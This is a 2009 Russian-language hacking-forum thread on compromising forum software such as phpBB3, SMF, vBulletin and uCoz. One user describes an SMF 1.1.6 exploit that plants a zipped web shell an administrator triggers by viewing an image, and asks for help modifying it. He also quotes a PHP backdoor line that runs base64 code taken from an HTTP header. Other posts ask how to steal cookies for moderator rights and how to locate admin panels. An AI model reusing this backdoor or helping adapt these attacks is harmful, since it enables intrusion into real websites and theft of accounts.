10.08.2009, 10:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Самый лучший способ знать всё - поиметь админку (в хорошем смысле) :-D
Про то как стырить и расшифровать хеш админки - другой раздел форума  |
|
|
12.08.2009, 09:58
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814836
Репутация:
0
|
|
Ребята, буду благодарен за совет. Взломали мой форум на phpbb3. Симптомы такие -он сам себя добавляет в пользователи, я запретил прикрепление файлов, а он добавляет картинку. В корне появилась куча файлов со странным расширением, но название сходны с оригинальными , типа зебра. Он сегодня ночью снова вернется. Как можно ему усложнить жизнь? Айпи меняет. Спасибо заранее
|
|
|
|
13.08.2009, 02:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 2
С нами:
8815299
Репутация:
0
|
|
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
|
|
|
|
13.08.2009, 10:37
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от leadtek
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
А не проще это сделать всё руками? если алгоритм понятен?
|
|
|
|
13.08.2009, 21:28
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 2
С нами:
8815299
Репутация:
0
|
|
Если бы все было бы ПОЛНОСТЬЮ понятно, то да %) Я не совсем, например, понял, что за шелл в архиве лежит...
Код:
if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
Это случаем не он? |
|
|
|
14.08.2009, 00:34
|
|
Banned
Регистрация: 13.06.2009
Сообщений: 12
С нами:
8901673
Репутация:
10
|
|
Парни подскажити как изменить дату регестрации на форуме?
мне на локалке нужно сделать это 
Если кто реально поможет вознагразу 3 баксами. |
|
|
|
16.08.2009, 13:01
|
|
Новичок
Регистрация: 14.08.2009
Сообщений: 16
С нами:
8811621
Репутация:
0
|
|
нужен vBulletin версии 3.0.x
выложите кто-нибудь
в инете искал так и не нашёл, либо битая ссылка, либо нету сидеров
----------------------------------------------------------------------
уже найдено
Последний раз редактировалось Magister Yoda; 18.08.2009 в 11:20..
|
|
|
|
16.08.2009, 15:04
|
|
Новичок
Регистрация: 18.01.2007
Сообщений: 15
С нами:
10163576
Репутация:
8
|
|
Кто подгонет материал (темы) на получения прав главного модера на юкозе? (как куки стырить и т.д)
|
|
|
|
17.08.2009, 14:56
|
|
Новичок
Регистрация: 16.04.2009
Сообщений: 1
С нами:
8984976
Репутация:
0
|
|
Меня интересует, можно-ли как-нибудь поднять себе репутацию на форуме версии vBulletin® Version 3.8.3 ?  |
|
|
|
05.09.2009, 15:08
|
|
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
С нами:
8843557
Репутация:
539
|
|
Подскажите пожалуйста как узнать пути до панели администратора в vBulletin? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
